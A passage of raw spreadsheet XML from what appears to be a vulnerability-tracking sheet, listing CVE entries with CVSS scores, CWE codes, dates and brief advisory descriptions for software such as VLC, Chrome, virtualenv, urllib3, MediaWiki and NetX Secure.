        <v>8.5</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0. This issue affects some unknown processing of the file /api/ZRnetwork/ping. Such manipulation of the argument url leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102794</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.8 → 8.5)</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102875</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>VLC media player before 3.0.24 contains a path traversal vulnerability in the skins2 ThemeLoader that fails to validate member names in .vlt skin archives. Attackers can craft malicious skin files with path traversal sequences to write arbitrary files with VLC user privileges, enabling code execution through Lua script injection.</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102875</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79403</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>CWE-280</t>
        </is>
      </c>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>An issue in Kilo Code before v7.4.1 allows a local attacker to execute arbitrary code via the permission/allow-everything endpoint</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79403</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100702</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S769"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769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100702</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100756</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>Incorrect boundary conditions in the Audio/Video: Playback component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100756</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95301</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 154.0.8037.57 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95301</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95344</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>Race condition in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass site isolation via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95344</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95376</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>Externally controlled reference in DevTools in Google Chrome prior to 154.0.8037.57 allowed an adjacent attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95376</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102930</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>pip:virtualenv</t>
        </is>
      </c>
      <c r="M774" s="5" t="inlineStr">
        <is>
          <t>21.7.12</t>
        </is>
      </c>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr"/>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>`download_wheel()` runs `pip download` and hands the result straight to the seeder, with nothing checking the bytes it gets back. The embedded pip and setuptools wheels carry a `BUNDLE_SHA256` that virtualenv checks on every load, but a wheel fetched over the network for the periodic-update feature or the `--download` flag had no equivalent verification.
A compromised index, a stale mirror, or a MITM'd download (when TLS is intercepted, e.g. via a misconfigured or malicious CA) could substitute a different wheel under the same distribution/version/filename, and virtualenv would cache and seed it into every environment created afterward with no warning.
Fixed by computing the downloaded wheel's sha256 and comparing it against the digest PyPI's public JSON API reports for that exact release, independent of which index actually served the file. The check is skipped, not treated as failure, when a custom index (`PIP_INDEX_URL`, `PIP_EXTRA_INDEX_URL`, `PIP_INDEX`) is configured, since a private index can legitimately serve a different, intentionally rebuilt wheel. Fix: https://github.com/pypa/virtualenv/pull/3251</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102930</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97687</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr">
        <is>
          <t>urllib3</t>
        </is>
      </c>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>pip:urllib3</t>
        </is>
      </c>
      <c r="M775" s="5" t="inlineStr">
        <is>
          <t>2.8.0</t>
        </is>
      </c>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr"/>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-440</t>
        </is>
      </c>
      <c r="S775"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775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97687</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100241</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="inlineStr"/>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - EventBus Extension allows Excavation.
This issue affects Mediawiki - EventBus Extension: 1.47.0-alpha.</t>
        </is>
      </c>
      <c r="T776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100241</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100244</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation Mediawiki - CentralAuth Extension allows Excavation.
This issue affects Mediawiki - CentralAuth Extension: from * before 1.46.1, 1.45.5, 1.43.10.</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100244</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S778"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778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S779"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779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S780"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780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102728</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t>Two client-side TLS/DTLS handshake parsers in NetX Secure read fields from a server-supplied message before validating that the message is long enough to contain them. Both are bounded out-of-bounds reads on a remotely reachable path, both are reached from a TLS or DTLS client connecting to a malicious or malformed server, and both have the same shape: the bounds check exists and returns the correct status, but it runs after the read it is meant to guard.</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102728</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102758</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S782" s="5" t="inlineStr">
        <is>
